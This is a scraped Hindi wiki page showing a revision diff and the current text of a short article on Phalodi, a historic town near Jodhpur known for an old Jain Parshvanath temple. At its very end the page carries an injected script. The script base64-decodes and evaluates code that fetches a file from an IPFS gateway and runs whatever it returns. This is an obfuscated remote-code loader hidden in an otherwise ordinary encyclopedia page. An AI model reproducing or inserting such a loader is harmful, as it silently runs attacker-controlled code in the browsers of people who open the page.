Difference between revisions of "फलौदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*फलौदी [[राजस्थान]] के पास स्थित एक ऐतिहासिक स्थल है।  
+
[[चित्र:Haveli-Phalodi.jpg|thumb|हवेली, फलौदी]]
*फलौदी में 12वीं शती से पूर्व का जैन [[तीर्थंकर पार्श्वनाथ|तीर्थकर पार्श्वनाथ]] का प्राचीन मंदिर है।  
+
'''फलौदी''' [[राजस्थान]] राज्य के [[जोधपुर]] शाहर के पास स्थित एक ऐतिहासिक स्थान है।  
 +
*यहाँ 12वीं शती से पूर्व का जैन [[तीर्थंकर पार्श्वनाथ|तीर्थकर पार्श्वनाथ]] का प्राचीन मंदिर है।  
 
*फलौदी का प्राचीन नाम फलर्द्धि है।  
 
*फलौदी का प्राचीन नाम फलर्द्धि है।  
 
*इसका नामोल्लेख जैन स्तोत्र तीर्थमाला चैत्यवंदन में इस प्रकार है:-  
 
*इसका नामोल्लेख जैन स्तोत्र तीर्थमाला चैत्यवंदन में इस प्रकार है:-  
<poem>'जीरापल्लि फलर्द्धि पारक नगे शैरीसशंखेश्वरे'।</poem>
+
:'जीरापल्लि फलर्द्धि पारक नगे शैरीसशंखेश्वरे'।  
  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=|प्रारम्भिक=|माध्यमिक= |पूर्णता= |शोध= }}
+
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 08:26, 7 August 2012

thumb|haveli, phalaudi phalaudi rajasthan rajy ke jodhapur shahar ke pas sthit ek aitihasik sthan hai.

  • yahaan 12vian shati se poorv ka jain tirthakar parshvanath ka prachin mandir hai.
  • phalaudi ka prachin nam phalarddhi hai.
  • isaka namollekh jain stotr tirthamala chaityavandan mean is prakar hai:-
'jirapalli phalarddhi parak nage shairisashankheshvare'.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>